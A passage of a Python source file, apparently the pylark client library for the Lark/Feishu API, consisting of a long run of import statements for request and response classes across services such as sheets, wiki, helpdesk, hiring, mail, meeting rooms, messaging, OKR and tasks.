SetSheetStyleReq, SetSheetStyleResp, ) from pylark.api_service_drive_sheet_value_append import ( AppendSheetValueReqValueRange, AppendSheetValueReq, AppendSheetValueRespUpdates, AppendSheetValueResp, ) from pylark.api_service_drive_sheet_value_batch_get import ( BatchGetSheetValueReq, BatchGetSheetValueRespValueRange, BatchGetSheetValueResp, ) from pylark.api_service_drive_sheet_value_batch_set import ( BatchSetSheetValueReqValueRange, BatchSetSheetValueReq, BatchSetSheetValueRespResponse, BatchSetSheetValueResp, ) from pylark.api_service_drive_sheet_value_get import ( GetSheetValueReq, GetSheetValueRespValueRange, GetSheetValueResp, ) from pylark.api_service_drive_sheet_value_prepend import ( PrependSheetValueReqValueRange, PrependSheetValueReq, PrependSheetValueRespUpdates, PrependSheetValueResp, ) from pylark.api_service_drive_sheet_value_set import ( SetSheetValueReqValueRange, SetSheetValueReq, SetSheetValueResp, ) from pylark.api_service_drive_wiki_move_docs_to_wiki import ( MoveDocsToWikiReq, MoveDocsToWikiResp, ) from pylark.api_service_drive_wiki_node_create import ( CreateWikiNodeReq, CreateWikiNodeRespNode, CreateWikiNodeResp, ) from pylark.api_service_drive_wiki_node_get import ( GetWikiNodeReq, GetWikiNodeRespNode, GetWikiNodeResp, ) from pylark.api_service_drive_wiki_node_list import ( GetWikiNodeListReq, GetWikiNodeListRespItem, GetWikiNodeListResp, ) from pylark.api_service_drive_wiki_space_create import ( CreateWikiSpaceReq, CreateWikiSpaceRespSpace, CreateWikiSpaceResp, ) from pylark.api_service_drive_wiki_space_get import ( GetWikiSpaceReq, GetWikiSpaceRespSpace, GetWikiSpaceResp, ) from pylark.api_service_drive_wiki_space_get_list import ( GetWikiSpaceListReq, GetWikiSpaceListRespItem, GetWikiSpaceListResp, ) from pylark.api_service_drive_wiki_space_member_add import ( AddWikiSpaceMemberReq, AddWikiSpaceMemberRespMember, AddWikiSpaceMemberResp, ) from pylark.api_service_drive_wiki_space_setting_update import ( UpdateWikiSpaceSettingReq, UpdateWikiSpaceSettingRespSetting, UpdateWikiSpaceSettingResp, ) from pylark.api_service_ecosystem import LarkEcosystemService from pylark.api_service_ecosystem_aweme_users_get import ( GetEcosystemBindAwemeUserReq, GetEcosystemBindAwemeUserRespAwemeUser, GetEcosystemBindAwemeUserResp, ) from pylark.api_service_ehr import LarkEHRService from pylark.api_service_ehr_download_attachment import ( DownloadEHRAttachmentsReq, DownloadEHRAttachmentsResp, DownloadEHRAttachmentsResp, ) from pylark.api_service_ehr_employee_get_list import ( GetEHREmployeeListReq, GetEHREmployeeListRespItemCustomField, GetEHREmployeeListRespItemSystemFieldsContractCompany, GetEHREmployeeListRespItemSystemFieldsNativeRegion, GetEHREmployeeListRespItemSystemFieldsWorkLocation, GetEHREmployeeListRespItemSystemFieldsJobLevel, GetEHREmployeeListRespItemSystemFieldsJob, GetEHREmployeeListRespItemSystemFieldsManager, GetEHREmployeeListRespItemSystemFields, GetEHREmployeeListRespItem, GetEHREmployeeListResp, ) from pylark.api_service_file import LarkFileService from pylark.api_service_file_download_file import ( DownloadFileReq, DownloadFileResp, DownloadFileResp, ) from pylark.api_service_file_download_image import ( DownloadImageReq, DownloadImageResp, DownloadImageResp, ) from pylark.api_service_file_upload_file import UploadFileReq, UploadFileResp from pylark.api_service_file_upload_image import UploadImageReq, UploadImageResp from pylark.api_service_helpdesk import LarkHelpdeskService from pylark.api_service_helpdesk_agent_email_get import ( GetHelpdeskAgentEmailReq, GetHelpdeskAgentEmailResp, ) from pylark.api_service_helpdesk_agent_patch import ( UpdateHelpdeskAgentReq, UpdateHelpdeskAgentResp, ) from pylark.api_service_helpdesk_agent_schedule_create import ( CreateHelpdeskAgentScheduleReqAgentScheduleSchedule, CreateHelpdeskAgentScheduleReqAgentSchedule, CreateHelpdeskAgentScheduleReq, CreateHelpdeskAgentScheduleResp, ) from pylark.api_service_helpdesk_agent_schedule_delete import ( DeleteHelpdeskAgentScheduleReq, DeleteHelpdeskAgentScheduleResp, ) from pylark.api_service_helpdesk_agent_schedule_get import ( GetHelpdeskAgentScheduleReq, GetHelpdeskAgentScheduleRespAgentScheduleAgentSkill, GetHelpdeskAgentScheduleRespAgentScheduleSchedule, GetHelpdeskAgentScheduleRespAgentScheduleAgent, GetHelpdeskAgentScheduleRespAgentSchedule, GetHelpdeskAgentScheduleResp, ) from pylark.api_service_helpdesk_agent_schedule_get_list import ( GetHelpdeskAgentScheduleListReq, GetHelpdeskAgentScheduleListRespAgentScheduleAgentSkill, GetHelpdeskAgentScheduleListRespAgentScheduleSchedule, GetHelpdeskAgentScheduleListRespAgentScheduleAgent, GetHelpdeskAgentScheduleListRespAgentSchedule, GetHelpdeskAgentScheduleListResp, ) from pylark.api_service_helpdesk_agent_schedule_update import ( UpdateHelpdeskAgentScheduleReqAgentScheduleSchedule, UpdateHelpdeskAgentScheduleReqAgentSchedule, UpdateHelpdeskAgentScheduleReq, UpdateHelpdeskAgentScheduleResp, ) from pylark.api_service_helpdesk_agent_skill_create import ( CreateHelpdeskAgentSkillReqRule, CreateHelpdeskAgentSkillReq, CreateHelpdeskAgentSkillResp, ) from pylark.api_service_helpdesk_agent_skill_delete import ( DeleteHelpdeskAgentSkillReq, DeleteHelpdeskAgentSkillResp, ) from pylark.api_service_helpdesk_agent_skill_get import ( GetHelpdeskAgentSkillReq, GetHelpdeskAgentSkillRespAgentSkillAgent, GetHelpdeskAgentSkillRespAgentSkillRule, GetHelpdeskAgentSkillRespAgentSkill, GetHelpdeskAgentSkillResp, ) from pylark.api_service_helpdesk_agent_skill_get_list import ( GetHelpdeskAgentSkillListReq, GetHelpdeskAgentSkillListRespAgentSkill, GetHelpdeskAgentSkillListResp, ) from pylark.api_service_helpdesk_agent_skill_rule_get_list import ( GetHelpdeskAgentSkillRuleListReq, GetHelpdeskAgentSkillRuleListRespRule, GetHelpdeskAgentSkillRuleListResp, ) from pylark.api_service_helpdesk_agent_skill_update import ( UpdateHelpdeskAgentSkillReqAgentSkillRules, UpdateHelpdeskAgentSkillReqAgentSkill, UpdateHelpdeskAgentSkillReq, UpdateHelpdeskAgentSkillResp, ) from pylark.api_service_helpdesk_category_create import ( CreateHelpdeskCategoryReq, CreateHelpdeskCategoryResp, ) from pylark.api_service_helpdesk_category_delete import ( DeleteHelpdeskCategoryReq, DeleteHelpdeskCategoryResp, ) from pylark.api_service_helpdesk_category_get import ( GetHelpdeskCategoryReq, GetHelpdeskCategoryResp, ) from pylark.api_service_helpdesk_category_get_list import ( GetHelpdeskCategoryListReq, GetHelpdeskCategoryListResp, ) from pylark.api_service_helpdesk_category_update import ( UpdateHelpdeskCategoryReq, UpdateHelpdeskCategoryResp, ) from pylark.api_service_helpdesk_event_subscribe import ( SubscribeHelpdeskEventReqEvent, SubscribeHelpdeskEventReq, SubscribeHelpdeskEventResp, ) from pylark.api_service_helpdesk_event_unsubscribe import ( UnsubscribeHelpdeskEventReqEvent, UnsubscribeHelpdeskEventReq, UnsubscribeHelpdeskEventResp, ) from pylark.api_service_helpdesk_faq_create import ( CreateHelpdeskFAQReqFAQ, CreateHelpdeskFAQReq, CreateHelpdeskFAQRespFAQCreateUser, CreateHelpdeskFAQRespFAQUpdateUser, CreateHelpdeskFAQRespFAQ, CreateHelpdeskFAQResp, ) from pylark.api_service_helpdesk_faq_delete import ( DeleteHelpdeskFAQReq, DeleteHelpdeskFAQResp, ) from pylark.api_service_helpdesk_faq_get import ( GetHelpdeskFAQReq, GetHelpdeskFAQRespFAQCreateUser, GetHelpdeskFAQRespFAQUpdateUser, GetHelpdeskFAQRespFAQ, GetHelpdeskFAQResp, ) from pylark.api_service_helpdesk_faq_get_image import ( GetHelpdeskFAQImageReq, GetHelpdeskFAQImageResp, GetHelpdeskFAQImageResp, ) from pylark.api_service_helpdesk_faq_get_list import ( GetHelpdeskFAQListReq, GetHelpdeskFAQListRespItemCreateUser, GetHelpdeskFAQListRespItemUpdateUser, GetHelpdeskFAQListRespItem, GetHelpdeskFAQListResp, ) from pylark.api_service_helpdesk_faq_search import ( SearchHelpdeskFAQReq, SearchHelpdeskFAQRespItem, SearchHelpdeskFAQResp, ) from pylark.api_service_helpdesk_faq_update import ( UpdateHelpdeskFAQReqFAQ, UpdateHelpdeskFAQReq, UpdateHelpdeskFAQResp, ) from pylark.api_service_helpdesk_start_service import ( StartHelpdeskServiceReq, StartHelpdeskServiceResp, ) from pylark.api_service_helpdesk_ticket_answer_user_query import ( AnswerHelpdeskTicketUserQueryReqFAQ, AnswerHelpdeskTicketUserQueryReq, AnswerHelpdeskTicketUserQueryResp, ) from pylark.api_service_helpdesk_ticket_customized_field_create import ( CreateHelpdeskTicketCustomizedFieldReq, CreateHelpdeskTicketCustomizedFieldResp, ) from pylark.api_service_helpdesk_ticket_customized_field_delete import ( DeleteHelpdeskTicketCustomizedFieldReq, DeleteHelpdeskTicketCustomizedFieldResp, ) from pylark.api_service_helpdesk_ticket_customized_field_get import ( GetHelpdeskTicketCustomizedFieldReq, GetHelpdeskTicketCustomizedFieldRespUpdatedBy, GetHelpdeskTicketCustomizedFieldRespCreatedBy, GetHelpdeskTicketCustomizedFieldResp, ) from pylark.api_service_helpdesk_ticket_customized_field_get_list import ( GetHelpdeskTicketCustomizedFieldListReq, GetHelpdeskTicketCustomizedFieldListRespItemUpdatedBy, GetHelpdeskTicketCustomizedFieldListRespItemCreatedBy, GetHelpdeskTicketCustomizedFieldListRespItem, GetHelpdeskTicketCustomizedFieldListResp, ) from pylark.api_service_helpdesk_ticket_customized_field_update import ( UpdateHelpdeskTicketCustomizedFieldReq, UpdateHelpdeskTicketCustomizedFieldResp, ) from pylark.api_service_helpdesk_ticket_get import ( GetHelpdeskTicketReq, GetHelpdeskTicketRespTicketCustomizedField, GetHelpdeskTicketRespTicketCollaborator, GetHelpdeskTicketRespTicketClosedBy, GetHelpdeskTicketRespTicketAgent, GetHelpdeskTicketRespTicketGuest, GetHelpdeskTicketRespTicket, GetHelpdeskTicketResp, ) from pylark.api_service_helpdesk_ticket_get_list import ( GetHelpdeskTicketListReq, GetHelpdeskTicketListRespTicketCustomizedField, GetHelpdeskTicketListRespTicketCollaborator, GetHelpdeskTicketListRespTicketClosedBy, GetHelpdeskTicketListRespTicketAgent, GetHelpdeskTicketListRespTicketGuest, GetHelpdeskTicketListRespTicket, GetHelpdeskTicketListResp, ) from pylark.api_service_helpdesk_ticket_image_download import ( DownloadHelpdeskTicketImageReq, DownloadHelpdeskTicketImageResp, DownloadHelpdeskTicketImageResp, ) from pylark.api_service_helpdesk_ticket_message_get_list import ( GetHelpdeskTicketMessageListReq, GetHelpdeskTicketMessageListRespMessage, GetHelpdeskTicketMessageListResp, ) from pylark.api_service_helpdesk_ticket_message_send import ( SendHelpdeskTicketMessageReq, SendHelpdeskTicketMessageResp, ) from pylark.api_service_helpdesk_ticket_update import ( UpdateHelpdeskTicketReqCustomizedField, UpdateHelpdeskTicketReq, UpdateHelpdeskTicketResp, ) from pylark.api_service_hire import LarkHireService from pylark.api_service_hire_application_create import ( CreateHireApplicationReq, CreateHireApplicationResp, ) from pylark.api_service_hire_application_get import ( GetHireApplicationReq, GetHireApplicationRespApplicationStage, GetHireApplicationRespApplication, GetHireApplicationResp, ) from pylark.api_service_hire_application_interview_list import ( GetHireApplicationInterviewListReq, GetHireApplicationInterviewListRespItemInterviewRecordInterviewScore, GetHireApplicationInterviewListRespItemInterviewRecord, GetHireApplicationInterviewListRespItem, GetHireApplicationInterviewListResp, ) from pylark.api_service_hire_application_list import ( GetHireApplicationListReq, GetHireApplicationListResp, ) from pylark.api_service_hire_application_terminate import ( TerminateHireApplicationReq, TerminateHireApplicationResp, ) from pylark.api_service_hire_attachment_get import ( GetHireAttachmentReq, GetHireAttachmentRespAttachment, GetHireAttachmentResp, ) from pylark.api_service_hire_attachment_preview_get import ( GetHireAttachmentPreviewReq, GetHireAttachmentPreviewResp, ) from pylark.api_service_hire_employee_get import ( GetHireEmployeeReq, GetHireEmployeeRespEmployee, GetHireEmployeeResp, ) from pylark.api_service_hire_employee_get_by_application import ( GetHireEmployeeByApplicationReq, GetHireEmployeeByApplicationRespEmployee, GetHireEmployeeByApplicationResp, ) from pylark.api_service_hire_employee_update import ( UpdateHireEmployeeReqOverboardInfo, UpdateHireEmployeeReqConversionInfo, UpdateHireEmployeeReq, UpdateHireEmployeeRespEmployee, UpdateHireEmployeeResp, ) from pylark.api_service_hire_job_get import ( GetHireJobReq, GetHireJobRespJobCustomizedDataValueTimeRange, GetHireJobRespJobCustomizedDataValueOptionName, GetHireJobRespJobCustomizedDataValueOption, GetHireJobRespJobCustomizedDataValueOptionName, GetHireJobRespJobCustomizedDataValueOption, GetHireJobRespJobCustomizedDataValue, GetHireJobRespJobCustomizedDataName, GetHireJobRespJobCustomizedData, GetHireJobRespJobJobType, GetHireJobRespJobJobCategory, GetHireJobRespJobHighlight, GetHireJobRespJobMaxJobLevel, GetHireJobRespJobMinJobLevel, GetHireJobRespJobCity, GetHireJobRespJobDepartment, GetHireJobRespJobRecruitmentType, GetHireJobRespJob, GetHireJobResp, ) from pylark.api_service_hire_job_manager_get import ( GetHireJobManagerReq, GetHireJobManagerRespInfo, GetHireJobManagerResp, ) from pylark.api_service_hire_job_process_list import ( GetHireJobProcessListReq, GetHireJobProcessListRespItemStage, GetHireJobProcessListRespItem, GetHireJobProcessListResp, ) from pylark.api_service_hire_note_create import ( CreateHireNoteReq, CreateHireNoteRespNote, CreateHireNoteResp, ) from pylark.api_service_hire_note_get import ( GetHireNoteReq, GetHireNoteRespNote, GetHireNoteResp, ) from pylark.api_service_hire_note_list import ( GetHireNoteListReq, GetHireNoteListRespItem, GetHireNoteListResp, ) from pylark.api_service_hire_note_update import ( UpdateHireNoteReq, UpdateHireNoteRespNote, UpdateHireNoteResp, ) from pylark.api_service_hire_offer_get_by_application import ( GetHireOfferByApplicationReq, GetHireOfferByApplicationRespOfferSalaryPlanCustomizeInfo, GetHireOfferByApplicationRespOfferSalaryPlan, GetHireOfferByApplicationRespOfferBasicInfoCustomizeInfo, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressCountry, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressState, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressCity, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressDistrict, GetHireOfferByApplicationRespOfferBasicInfoWorkAddress, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressCountry, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressState, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressCity, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressDistrict, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddress, GetHireOfferByApplicationRespOfferBasicInfoLevel, GetHireOfferByApplicationRespOfferBasicInfoSequence, GetHireOfferByApplicationRespOfferBasicInfoRecruitmentType, GetHireOfferByApplicationRespOfferBasicInfo, GetHireOfferByApplicationRespOffer, GetHireOfferByApplicationResp, ) from pylark.api_service_hire_offer_schema_get import ( GetHireOfferSchemaReq, GetHireOfferSchemaRespObjectOptionName, GetHireOfferSchemaRespObjectOption, GetHireOfferSchemaRespObjectName, GetHireOfferSchemaRespObject, GetHireOfferSchemaResp, ) from pylark.api_service_hire_referral_get_by_application import ( GetHireReferralByApplicationReq, GetHireReferralByApplicationRespReferral, GetHireReferralByApplicationResp, ) from pylark.api_service_hire_resume_sources_get import ( GetHireResumeSourceReq, GetHireResumeSourceRespItem, GetHireResumeSourceResp, ) from pylark.api_service_hire_talent_get import ( GetHireTalentReq, GetHireTalentRespTalentInterviewRegistration, GetHireTalentRespTalentResumeSource, GetHireTalentRespTalentSns, GetHireTalentRespTalentLanguage, GetHireTalentRespTalentCertificate, GetHireTalentRespTalentCompetition, GetHireTalentRespTalentAward, GetHireTalentRespTalentWorks, GetHireTalentRespTalentProject, GetHireTalentRespTalentCareer, GetHireTalentRespTalentEducation, GetHireTalentRespTalentBasicInfoPreferredCity, GetHireTalentRespTalentBasicInfoHometownCity, GetHireTalentRespTalentBasicInfoCurrentCity, GetHireTalentRespTalentBasicInfoNationality, GetHireTalentRespTalentBasicInfo, GetHireTalentRespTalent, GetHireTalentResp, ) from pylark.api_service_hire_transfer_onboard_by_application import ( MakeHireTransferOnboardByApplicationReq, MakeHireTransferOnboardByApplicationResp, ) from pylark.api_service_human_auth import LarkHumanAuthService from pylark.api_service_human_auth_face_verify_crop_image import ( CropFaceVerifyImageReq, CropFaceVerifyImageResp, ) from pylark.api_service_human_auth_face_verify_get_auth_result import ( GetFaceVerifyAuthResultReq, GetFaceVerifyAuthResultResp, ) from pylark.api_service_human_auth_face_verify_upload_image import ( UploadFaceVerifyImageReq, UploadFaceVerifyImageResp, ) from pylark.api_service_human_auth_identity import CreateIdentityReq, CreateIdentityResp from pylark.api_service_jssdk import LarkJssdkService from pylark.api_service_jssdk_ticket_get import GetJssdkTicketReq, GetJssdkTicketResp from pylark.api_service_link_open_bot import OpenBotReq, OpenBotResp from pylark.api_service_link_open_calender import OpenCalenderReq, OpenCalenderResp from pylark.api_service_link_open_calender_account import ( OpenCalenderAccountReq, OpenCalenderAccountResp, ) from pylark.api_service_link_open_calender_event_create import ( OpenCalenderEventCreateReq, OpenCalenderEventCreateResp, ) from pylark.api_service_link_open_calender_view import ( OpenCalenderViewReq, OpenCalenderViewResp, ) from pylark.api_service_link_open_chat import OpenChatReq, OpenChatResp from pylark.api_service_link_open_docs import OpenDocsReq, OpenDocsResp from pylark.api_service_link_open_lark import OpenLarkReq, OpenLarkResp from pylark.api_service_link_open_mini_program import ( OpenMiniProgramReq, OpenMiniProgramResp, ) from pylark.api_service_link_open_sso_login import OpenSSOLoginReq, OpenSSOLoginResp from pylark.api_service_link_open_web_app import OpenWebAppReq, OpenWebAppResp from pylark.api_service_link_open_web_url import OpenWebURLReq, OpenWebURLResp from pylark.api_service_mail import LarkMailService from pylark.api_service_mail_mail_group_create import ( CreateMailGroupReq, CreateMailGroupResp, ) from pylark.api_service_mail_mail_group_delete import ( DeleteMailGroupReq, DeleteMailGroupResp, ) from pylark.api_service_mail_mail_group_get import GetMailGroupReq, GetMailGroupResp from pylark.api_service_mail_mail_group_get_list import ( GetMailGroupListReq, GetMailGroupListRespItem, GetMailGroupListResp, ) from pylark.api_service_mail_mail_group_member_create import ( CreateMailGroupMemberReq, CreateMailGroupMemberResp, ) from pylark.api_service_mail_mail_group_member_delete import ( DeleteMailGroupMemberReq, DeleteMailGroupMemberResp, ) from pylark.api_service_mail_mail_group_member_get import ( GetMailGroupMemberReq, GetMailGroupMemberResp, ) from pylark.api_service_mail_mail_group_member_get_list import ( GetMailGroupMemberListReq, GetMailGroupMemberListRespItem, GetMailGroupMemberListResp, ) from pylark.api_service_mail_mail_group_patch import ( UpdateMailGroupPatchReq, UpdateMailGroupPatchResp, ) from pylark.api_service_mail_mail_group_permission_member_create import ( CreateMailGroupPermissionMemberReq, CreateMailGroupPermissionMemberResp, ) from pylark.api_service_mail_mail_group_permission_member_delete import ( DeleteMailGroupPermissionMemberReq, DeleteMailGroupPermissionMemberResp, ) from pylark.api_service_mail_mail_group_permission_member_get import ( GetMailGroupPermissionMemberReq, GetMailGroupPermissionMemberResp, ) from pylark.api_service_mail_mail_group_permission_member_get_list import ( GetMailGroupPermissionMemberListReq, GetMailGroupPermissionMemberListRespItem, GetMailGroupPermissionMemberListResp, ) from pylark.api_service_mail_mail_group_update import ( UpdateMailGroupReq, UpdateMailGroupResp, ) from pylark.api_service_mail_public_mailbox_create import ( CreatePublicMailboxReq, CreatePublicMailboxResp, ) from pylark.api_service_mail_public_mailbox_delete import ( DeletePublicMailboxReq, DeletePublicMailboxResp, ) from pylark.api_service_mail_public_mailbox_get import ( GetPublicMailboxReq, GetPublicMailboxResp, ) from pylark.api_service_mail_public_mailbox_get_list import ( GetPublicMailboxListReq, GetPublicMailboxListRespItem, GetPublicMailboxListResp, ) from pylark.api_service_mail_public_mailbox_member_clear import ( ClearPublicMailboxMemberReq, ClearPublicMailboxMemberResp, ) from pylark.api_service_mail_public_mailbox_member_create import ( CreatePublicMailboxMemberReq, CreatePublicMailboxMemberResp, ) from pylark.api_service_mail_public_mailbox_member_delete import ( DeletePublicMailboxMemberReq, DeletePublicMailboxMemberResp, ) from pylark.api_service_mail_public_mailbox_member_get import ( GetPublicMailboxMemberReq, GetPublicMailboxMemberResp, ) from pylark.api_service_mail_public_mailbox_member_get_list import ( GetPublicMailboxMemberListReq, GetPublicMailboxMemberListRespItem, GetPublicMailboxMemberListResp, ) from pylark.api_service_mail_public_mailbox_patch import ( UpdatePublicMailboxPatchReq, UpdatePublicMailboxPatchResp, ) from pylark.api_service_mail_public_mailbox_update import ( UpdatePublicMailboxReq, UpdatePublicMailboxResp, ) from pylark.api_service_meeting_room import LarkMeetingRoomService from pylark.api_service_meeting_room_building_batch_get import ( BatchGetMeetingRoomBuildingReq, BatchGetMeetingRoomBuildingRespBuilding, BatchGetMeetingRoomBuildingResp, ) from pylark.api_service_meeting_room_building_batch_get_id import ( BatchGetMeetingRoomBuildingIDReq, BatchGetMeetingRoomBuildingIDRespBuilding, BatchGetMeetingRoomBuildingIDResp, ) from pylark.api_service_meeting_room_building_create import ( CreateMeetingRoomBuildingReq, CreateMeetingRoomBuildingResp, ) from pylark.api_service_meeting_room_building_delete import ( DeleteMeetingRoomBuildingReq, DeleteMeetingRoomBuildingResp, ) from pylark.api_service_meeting_room_building_get_list import ( GetMeetingRoomBuildingListReq, GetMeetingRoomBuildingListRespBuilding, GetMeetingRoomBuildingListResp, ) from pylark.api_service_meeting_room_building_update import ( UpdateMeetingRoomBuildingReq, UpdateMeetingRoomBuildingResp, ) from pylark.api_service_meeting_room_country_get_list import ( GetMeetingRoomCountryListReq, GetMeetingRoomCountryListRespCountries, GetMeetingRoomCountryListResp, ) from pylark.api_service_meeting_room_district_get_list import ( GetMeetingRoomDistrictListReq, GetMeetingRoomDistrictListRespDistricts, GetMeetingRoomDistrictListResp, ) from pylark.api_service_meeting_room_freebusy_batch_get import ( BatchGetMeetingRoomFreebusyReq, BatchGetMeetingRoomFreebusyRespFreeBusyRoomIDOrganizerInfo, BatchGetMeetingRoomFreebusyRespFreeBusyRoomID, BatchGetMeetingRoomFreebusyRespFreeBusy, BatchGetMeetingRoomFreebusyResp, ) from pylark.api_service_meeting_room_instance_reply import ( ReplyMeetingRoomInstanceReq, ReplyMeetingRoomInstanceResp, ) from pylark.api_service_meeting_room_room_batch_get import ( BatchGetMeetingRoomRoomReq, BatchGetMeetingRoomRoomRespRoom, BatchGetMeetingRoomRoomResp, ) from pylark.api_service_meeting_room_room_batch_get_id import ( BatchGetMeetingRoomRoomIDReq, BatchGetMeetingRoomRoomIDRespRoom, BatchGetMeetingRoomRoomIDResp, ) from pylark.api_service_meeting_room_room_create import ( CreateMeetingRoomRoomReq, CreateMeetingRoomRoomResp, ) from pylark.api_service_meeting_room_room_delete import ( DeleteMeetingRoomRoomReq, DeleteMeetingRoomRoomResp, ) from pylark.api_service_meeting_room_room_get_list import ( GetMeetingRoomRoomListReq, GetMeetingRoomRoomListRespRoom, GetMeetingRoomRoomListResp, ) from pylark.api_service_meeting_room_room_update import ( UpdateMeetingRoomRoomReq, UpdateMeetingRoomRoomResp, ) from pylark.api_service_meeting_room_summary_batch_get import ( BatchGetMeetingRoomSummaryReqEventUid, BatchGetMeetingRoomSummaryReq, BatchGetMeetingRoomSummaryRespErrorEventUid, BatchGetMeetingRoomSummaryRespEventInfo, BatchGetMeetingRoomSummaryResp, ) from pylark.api_service_message import LarkMessageService from pylark.api_service_message_batch_delete import ( BatchDeleteMessageReq, BatchDeleteMessageResp, ) from pylark.api_service_message_batch_send_old import ( BatchSendOldRawMessageReq, BatchSendOldRawMessageResp, ) from pylark.api_service_message_delete import DeleteMessageReq, DeleteMessageResp from pylark.api_service_message_ephemeral_delete import ( DeleteEphemeralMessageReq, DeleteEphemeralMessageResp, ) from pylark.api_service_message_get import ( GetMessageReq, GetMessageRespItem, GetMessageResp, ) from pylark.api_service_message_get_batch_msg_read_user import ( GetBatchSentMessageReadUserReq, GetBatchSentMessageReadUserRespReadUser, GetBatchSentMessageReadUserResp, ) from pylark.api_service_message_get_file import ( GetMessageFileReq, GetMessageFileResp, GetMessageFileResp, ) from pylark.api_service_message_get_read_user_list import ( GetMessageReadUserListReq, GetMessageReadUserListRespItem, GetMessageReadUserListResp, ) from pylark.api_service_message_list import ( GetMessageListReq, GetMessageListRespItem, GetMessageListResp, ) from pylark.api_service_message_reply import ReplyRawMessageReq, ReplyRawMessageResp from pylark.api_service_message_send import SendRawMessageReq, SendRawMessageResp from pylark.api_service_message_send_ephemeral import ( SendEphemeralMessageReq, SendEphemeralMessageResp, ) from pylark.api_service_message_send_old import ( SendRawMessageOldReqContent, SendRawMessageOldReq, SendRawMessageOldResp, ) from pylark.api_service_message_send_urgent_app import ( SendUrgentAppMessageReq, SendUrgentAppMessageResp, ) from pylark.api_service_message_send_urgent_phone import ( SendUrgentPhoneMessageReq, SendUrgentPhoneMessageResp, ) from pylark.api_service_message_send_urgent_sms import ( SendUrgentSmsMessageReq, SendUrgentSmsMessageResp, ) from pylark.api_service_message_update import UpdateMessageReq, UpdateMessageResp from pylark.api_service_okr import LarkOKRService from pylark.api_service_okr_okr_batch_get import ( BatchGetOKRReq, BatchGetOKRRespOKRObjectiveAligningObjectiveOwner, BatchGetOKRRespOKRObjectiveAligningObjective, BatchGetOKRRespOKRObjectiveAlignedObjectiveOwner, BatchGetOKRRespOKRObjectiveAlignedObjective, BatchGetOKRRespOKRObjectiveKrProgressRate, BatchGetOKRRespOKRObjectiveKr, BatchGetOKRRespOKRObjectiveProgressRate, BatchGetOKRRespOKRObjective, BatchGetOKRRespOKR, BatchGetOKRResp, ) from pylark.api_service_okr_period_get_list import ( GetOKRPeriodListReq, GetOKRPeriodListRespItem, GetOKRPeriodListResp, ) from pylark.api_service_okr_user_okr_get_list import ( GetUserOKRListReq, GetUserOKRListRespOKRObjectiveAligningObjectiveOwner, GetUserOKRListRespOKRObjectiveAligningObjective, GetUserOKRListRespOKRObjectiveAlignedObjectiveOwner, GetUserOKRListRespOKRObjectiveAlignedObjective, GetUserOKRListRespOKRObjectiveKrProgressRate, GetUserOKRListRespOKRObjectiveKr, GetUserOKRListRespOKRObjectiveProgressRate, GetUserOKRListRespOKRObjective, GetUserOKRListRespOKR, GetUserOKRListResp, ) from pylark.api_service_search import LarkSearchService from pylark.api_service_search_data_source_create import ( CreateSearchDataSourceReq, CreateSearchDataSourceRespDataSource, CreateSearchDataSourceResp, ) from pylark.api_service_search_data_source_delete import ( DeleteSearchDataSourceReq, DeleteSearchDataSourceResp, ) from pylark.api_service_search_data_source_get import ( GetSearchDataSourceReq, GetSearchDataSourceRespDataSource, GetSearchDataSourceResp, ) from pylark.api_service_search_data_source_item_create import ( CreateSearchDataSourceItemReqContent, CreateSearchDataSourceItemReqMetadata, CreateSearchDataSourceItemReqACL, CreateSearchDataSourceItemReq, CreateSearchDataSourceItemResp, ) from pylark.api_service_search_data_source_item_delete import ( DeleteSearchDataSourceItemReq, DeleteSearchDataSourceItemResp, ) from pylark.api_service_search_data_source_item_get import ( GetSearchDataSourceItemReq, GetSearchDataSourceItemRespItemContent, GetSearchDataSourceItemRespItemMetadata, GetSearchDataSourceItemRespItemACL, GetSearchDataSourceItemRespItem, GetSearchDataSourceItemResp, ) from pylark.api_service_search_data_source_list import ( GetSearchDataSourceListReq, GetSearchDataSourceListRespItem, GetSearchDataSourceListResp, ) from pylark.api_service_search_data_source_patch import ( UpdateSearchDataSourceReq, UpdateSearchDataSourceRespDataSource, UpdateSearchDataSourceResp, ) from pylark.api_service_task import LarkTaskService from pylark.api_service_task_collaborator_create import ( CreateTaskCollaboratorReq, CreateTaskCollaboratorRespCollaborator, CreateTaskCollaboratorResp, ) from pylark.api_service_task_collaborator_delete import ( DeleteTaskCollaboratorReq, DeleteTaskCollaboratorResp, ) from pylark.api_service_task_collaborator_list import ( GetTaskCollaboratorListReq, GetTaskCollaboratorListRespItem, GetTaskCollaboratorListResp, ) from pylark.api_service_task_comment_create import ( CreateTaskCommentReq, CreateTaskCommentRespComment, CreateTaskCommentResp, ) from pylark.api_service_task_comment_delete import ( DeleteTaskCommentReq, DeleteTaskCommentResp, ) from pylark.api_service_task_comment_get import ( GetTaskCommentReq, GetTaskCommentRespComment, GetTaskCommentResp, ) from pylark.api_service_task_comment_update import ( UpdateTaskCommentReq, UpdateTaskCommentRespComment, UpdateTaskCommentResp, ) from pylark.api_service_task_follower_create import ( CreateTaskFollowerReq, CreateTaskFollowerRespFollower, CreateTaskFollowerResp, ) from pylark.api_service_task_follower_delete import ( DeleteTaskFollowerReq, DeleteTaskFollowerResp, ) from pylark.api_service_task_follower_list import ( GetTaskFollowerListReq, GetTaskFollowerListRespItem, GetTaskFollowerListResp, ) from pylark.api_service_task_reminder_create import ( CreateTaskReminderReq, CreateTaskReminderRespReminder, CreateTaskReminderResp, ) from pylark.api_service_task_reminder_delete import ( DeleteTaskReminderReq, DeleteTaskReminderResp, ) from pylark.api_service_task_reminder_list import ( GetTaskReminderListReq, GetTaskReminderListRespItem, GetTaskReminderListResp, ) from pylark.api_service_task_task import ( GetTaskReq, GetTaskRespTaskOriginHref, GetTaskRespTaskOrigin, GetTaskRespTaskDue, GetTaskRespTask, GetTaskResp, ) from pylark.api_service_task_task_complete import CompleteTaskReq, CompleteTaskResp from pylark.api_service_task_task_create import ( CreateTaskReqOriginHref, CreateTaskReqOrigin, CreateTaskReqDue, CreateTaskReq, CreateTaskRespTaskOriginHref, CreateTaskRespTaskOrigin, CreateTaskRespTaskDue, CreateTaskRespTask, 